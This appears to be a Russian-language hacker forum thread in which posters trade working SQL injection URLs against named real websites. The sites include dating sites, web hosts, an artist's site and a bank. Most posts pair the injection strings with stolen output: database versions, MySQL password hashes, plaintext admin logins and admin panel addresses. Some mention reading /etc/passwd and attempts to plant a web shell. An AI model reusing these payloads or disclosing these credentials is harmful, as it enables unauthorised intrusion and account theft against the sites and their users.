SQL Инъекции

loveus.ru

http://loveus.ru/forum/?roomid=341/**/union/**/select/**/version(),2--

Версия MySQL:
5.1.26-rc
-------
Имя базы:
lovas
-------
Юзер:
admin@localhost

Данные по полям User,Password,File_priv из таблицы mysql.user:
-------
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
Dunkan:*6FD087AFBFB4C2995C3C0AD9D2D5FB582CDDBF46:Y
lovas:*47B11BE6589C2FDE355C316D9DB18DB0C06CC536:Y
admin:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y

 

www.glaad.org
/etc/passwd

file_priv=y

document root
/www/www/doc-root/media/resource_kit_detail.php
залить нелл не удалось, ненашел папку справами на запись

www.dissentmagazine.org

admin:32fea379cc31c22c27761ec9d08e630c
root:0643c3fdceb7e8eeeaa914850a1eec85
админку неискал, хеши не расшифровывал =)

 

Всем привА.
Я тут решил запостится.
вообщем так.

вот сайтеГ нашёл

Code:

http://www.penpal.ru

решил же глянуть, чё там и к чему =)

Как всегда, стандартная проверка

Code:

http://www.penpal.ru/cgi-bin/person.pl?id=-1175185312'

Узнаем что имееЦЦо 28 полей, и одно принтабельное - 21

Code:

http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Версия скулИ 5-я
(пальцем в небо) ибо даже через http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+and+substring(@@version,1,1)=5 не признавалось, или это Я =)))))


короче полазил, полазил...нашёл таблицу person
а в ней поля
id - идентификаторы
passw - пароли в чистом виде
email - мылы
icq - аси(есть не у всех)

похакал.....и дальше пошёл
Одминку не нашёл =(

-----
P.S
Странно было, когда я ввёл в это принтабельное поле запрос version()....оно не выдало мне версию, а выдало что такой таблицы нету.

 

1337haxx0r

а так не пробвал ? ))

 

Официальный сайт Группы "Ляпис Трубецкой"

Единственная таблица которую нашел.

 

....фак, я и не знал....поэтому и не додумался =)

но спасибо, теперь уж буду знать =)

 

Вот ещё нашёл сайтеГ =)

Вообщем, проверяем и видим ошибочку скулЯ

Code:

http://www.kateeya.com/content.php?menu=-2'

имеем 6 полей одно принтабельное - 2

Code:

http://www.kateeya.com/content.php?menu=2+order+by+6--

http://www.kateeya.com/content.php?menu=2+union+select+1,2,3,4,5,6--

Версия скули 5-я
Значит заюзаем information_schema

Code:

http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3,4,5,6++from+information_schema.columns--

нам тут полный фарт, видим все таблицы с полями, ищем интерессные.....а это
siji_user:::user_id - идентификаторы
siji_user:::user_name - юзеры
siji_user:::user_pwd - пароли в чистом виде
siji_user:::user_email - мылы

смотрим и видим одну запись....которая нас радует и при этом поднимает настроение =)))))

Code:

http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a3a,user_name,user_pwd),3,4,5,6++from+siji_user--

Конечный итог:
Username: admin
Password: admin
Админка: http://www.kateeya.com/admin/login.php

----
Пока что всё, всем приятного и удачного хакинга =))))

 

ещё один бажный сайт.....хостинг

Проверяем

Code:

http://www.webhostingjury.com/hosts.php?id=-534'

имеем ошибкку, и узнаем что имееЦЦо 3 поля, одно принтабельно - 2

Code:

http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,2,3--

Версия Мускуля 5-я
знач обращаемся к нашей информационной таблице information_schema

Code:

http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3+from+information_schema.columns--

ждём пока выведутся все поля и таблицы...

находим нас интересующие, а именно:

admin:::adm_username - имя админского юзера
admin:::adm_password - пароль в открытом виде

или

hosts:::username - имя юзера(хоста)
hosts::: password - пароли в чистом виде

Code:

http://www.webhostingjury.com
/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,adm_password,adm_username),3+from+admin--

http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,password,username),3+from+hosts--

я брал админа.
получаем: imkool:::ajay

Конечный итог:
Admin Username: ajay
Admin Password: imkool

Админка: http://www.webhostingjury.com./adm/www/admin/index.php

---
...но почему-то не проходит инфа в админке...
логин юзеров не искал....

 

ну я сегодня в угаре(на работе нечего делать) =))))

сайт знакомств, с виду приличный...а как капнёшь глубже...ппц

Смотрим, скуля начинает ругаЦЦо =)

Code:

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215'

пробиваем поля, у нас их 23, из них штук 5 принтабельных.
Версия скулИ 5-я (везёт мне) =)

поперебирал я лимитом....нашёл таблицы

dating_adminmembers:::username
dating_adminmembers::: password

Code:

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+limit+166,1--

и

members:::username
members::: password

Code:

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+limit+519,1--

Я брал админа

Code:

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dating_adminmembers--

admin:::admin456
пасс в чистейшем виде, оч замечательно =)

ОдминкО: http://www.datingfunda.com/webadmin/

 

ещё один хостинг


14 полей, два принтабельных - 6,7

Code:

http://www.torontowebhost.com/mod.php?mod=pages&mode=view&id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Версия скули 4-я
будем перебирать ручками...
и без особого труда нашлась табличка admins

в которой присутсвовали поля:
admin_user_name
admin_email

к сожалению поле с паролями не побобрал....пробовал много вариантов....но без результатно.

Code:

http://www.torontowebhost.com/mod.php?mod=pages&mode=view&id=-2+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,admin_user_name,admin_email),7,8,9,10,11,12,13,14+from+admins--

webmaster:::[email protected]
может кому будет интерессно, подберёт =)

логин в админку:

Code:

http://www.torontowebhost.com/login.php?w=admin&o=login

-----
Там ещё в портфолио есть сайты.....так же коряво написаны

 

офф сайт украинской певицы Русланы

там 5-я версия скули.

Code:

http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a3a3a,table_name,column_name)+from+information_schema.columns--

одно поле...оно же принтабельно

Code:

http://www.ruslana.ua/ua/press.php?ln=-1+union+select+1--

имеем права на доступ к таблице mysql

Code:

http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a3a3a,user,password)+from+mysql.user--

показало три юзера


root:::*A6D3F6E96E35BC972C685AFE44507517B5C87F4C
root:::
astra:::*C301AD7E05B309F011D781BA2E1CD97AF0CC9622

дальше ничё особо не делал =)

 

Code:

http://www.davinciinstitute.com/page...ersion(),5,6/*

version: 5.0.42
user: davinci@localhost
database: davinciinstitute_com

Code:

http://trusteelearning.org/news_read...on(),6,7,8,9/*

version: 4.1.20-max-log
user: [email protected]
database: savoadm_etraining

Code:

http://quiddich.voldemort.ru/forum.p...,4,5,6,7,8,9/*

version: 4.1.22
user: voldemor_loki@localhost
database: voldemor_loki

Code:

http://www.bt-shop.ru/section_output...sion(),5,6,7/*

version: 4.0.27-log
user: [email protected]
database: bt-shop

 

1

2

апд: юзаем http://code.google.com/p/awebtool/

 

http://www.downtowncrossing.org/shop/shop.php?id=103+union+select+1,version(),3,4
version() - 5.0.51a-log
user() - Children
database() - Children

http://shop.vashtextil.com.ua/shop.php?id=-1'+union+select+1,2,3,4,5/*
user()- [email protected]

http://www.spygenius.co.uk/shop.php?id=-1+union+all+select+1,2,version(),4,5,6
version() - 5.0.27-log
user() - [email protected]
database() - spygenius

http://www.uazmadi.ru/shop.php?id=-6+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13
version() - 5.0.37
user() - avtomoto@localhost
database() - avtomoto


http://www.avtobamper.ru/shop.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13
version() - 5.0.37
user() - avtomoto@localhost
database() - avtobamper

http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+version()
version() - 5.0.45-log -
user() - site@localhost
database() - property_site
http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+concat_ws(0x3a,userid,username,password)+from+admin_users+limit%201,1

Code:

2:admin:$1$jzxqs61n$6hbnVvtb1cJMuHJUJgVEo1
3:alex:$1$rygwg7ng$vwJgHDDb6kOwbn5HcuvT80
4:silveto:$1$55ff1d9v$4ICVoQL.pf0eGBGviplP5.
5:test:$1$8mx0df49$y63yix4opv5W/.YYTAaUT/
6:petya:$1$9v1qx3yv$74NKlG/INFJictQUM6TGN0

http://www.propertiesbulgaria.biz/admin админка здесь

 

Міжрегіональна Академія управління персоналом (МАУП)
PR: 4
тИЦ: 180
http://www.maup.com.ua/news/newst.php?tema=-9999+union+select+1,2,version(),4,5/*

VERSION: 4.0.27-standard

 

version: 4.1.22
user: dissent@localhost
database: dissent

Вывод внизу.

-----------------------------------------------------------

version: 5.0.41-log
user: root@localhost
database: tinymce

 

file_priv a также dir )

юзеры форума.. forum.ruslana.ua

wp..

admin:$P$B3XVWvBWhENjDsGfhZvFnT9bwxsyI7/

дай пасс дам шелл )

пс: заветное поле - pword

 

fastpublish cms

admin:skatrunde:0a8e991a10144d5056eac00f50b10f2f

 

http://www.bfgbank.ru/index.php?BFGBASID=d8ae804ab8c24dae8dee6eca71b17774&action=LegalServises'+union+select+1--
вот скуля на банке..дальше как крутить не знаю..+информатион_схема.теблес не идёт(((